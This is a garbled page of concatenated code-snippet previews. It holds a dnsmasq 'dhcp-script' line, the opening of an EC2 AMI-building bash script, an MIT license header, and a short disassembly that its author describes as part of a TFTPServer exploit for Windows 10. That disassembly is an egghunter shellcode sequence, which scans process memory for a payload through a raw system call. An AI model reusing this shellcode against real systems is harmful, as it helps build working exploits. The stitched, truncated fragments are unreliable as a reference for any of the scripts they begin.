dhcp-script=/etc/detect_new_device.sh
Reference:
#!/bin/bash | |
# This script require the following EC2 APIs: | |
# DescribeSnapshots | |
# CreateSnapshot | |
# RegisterImage | |
# runtime overridable defaults: | |
AMI_VIRT_TYPE=hvm | |
AMI_ARCH=x86_64 | |
AMI_RELEASE=buster |
;; These memory maps I take to create TFTPServer exploit on Windows 10 | |
0062FF72 66:81CA FF0F OR DX,0FFF | |
0062FF77 42 INC EDX | |
0062FF78 52 PUSH EDX | |
0062FF79 33C0 XOR EAX,EAX | |
0062FF7B 66:B8 C601 MOV AX,1C6 | |
0062FF7F CD 2E INT 2E | |
0062FF81 3C 05 CMP AL,5 | |
0062FF83 5A POP EDX |
dhcp-script=/etc/detect_new_device.sh
Reference:
#!/bin/bash | |
# The MIT License (MIT) | |
# | |
# Copyright (c) 2015 Philip Huppert | |
# | |
# Permission is hereby granted, free of charge, to any person obtaining a copy of | |
# this software and associated documentation files (the "Software"), to deal in | |
# the Software without restriction, including without limitation the rights to | |
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of |